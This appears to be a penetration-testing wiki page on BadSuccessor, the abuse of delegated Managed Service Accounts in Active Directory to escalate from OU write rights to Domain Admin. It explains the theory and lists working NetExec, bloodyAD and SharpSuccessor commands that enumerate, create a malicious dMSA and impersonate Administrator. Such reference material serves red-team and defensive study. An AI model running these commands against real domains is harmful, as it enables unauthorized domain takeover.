BadSuccessor (dMSA abuse)

Theory

In Windows Server 2025, Microsoft introduced delegated Managed Service Accounts (dMSAs). A dMSA is a new type of service account in Active Directory (AD) that expands on the capabilities of group Managed Service Accounts (gMSAs).

If we have GenericAll, CreateChild, WriteDACL, or WriteOwner permissions on any OU—or can modify an existing dMSA, we can escalate from low-level access to full Domain Admin via the BadSuccessor technique.

Exploiting this vector does not require the domain to actively use dMSAs. The feature is automatically enabled in any domain that includes at least one Windows Server 2025 domain controller, and its presence alone is enough to make the attack path viable.

Practice

NetExec (Python) can be used to enulerate if a a target is vulnerable to bad successor attack

netexec ldap $DC_IP -u $USER -p $PASSWORD -M badsuccessor

We can then exploit it using BloodyAd (Python).

# Enumerate writable attributes for the user we are authenticating as
bloodyAD -d $DOMAIN_FQDN -u $USER -p $PASSWORD --host $DC_FQDN get writable --detail

# BadSuccessor attack to create the dMSA object called dmsa_pwn
bloodyAD -d $DOMAIN_FQDN -u $USER -p $PASSWORD --host $DC_FQDN add badSuccessor dmsa_pwn

You can use the Get-BadSuccessorOUPermissions.ps1 script to identify if a a target is vulnerable to bad successor attack.

.\Get-BadSuccessorOUPermissions.ps1

SharpSuccessor (C#) can the be used to exploit it

# /path: The OU that the user has access to
# /account: Account that have enought permissions on the OU
# /name: name for the dMSA object that will be created 
.\SharpSuccessor.exe add /path:"ou=badOU,dc=domain,dc=local" /account:$USERNAME /name:dmsa_pwned /impersonate:Administrator

Resources

BadSuccessor: Abusing dMSA to Escalate Privileges in Active DirectoryAkamai Technologies

Understanding & Mitigating BadSuccessor - SpecterOpsSpecterOps

Last updated 4 months ago

Was this helpful?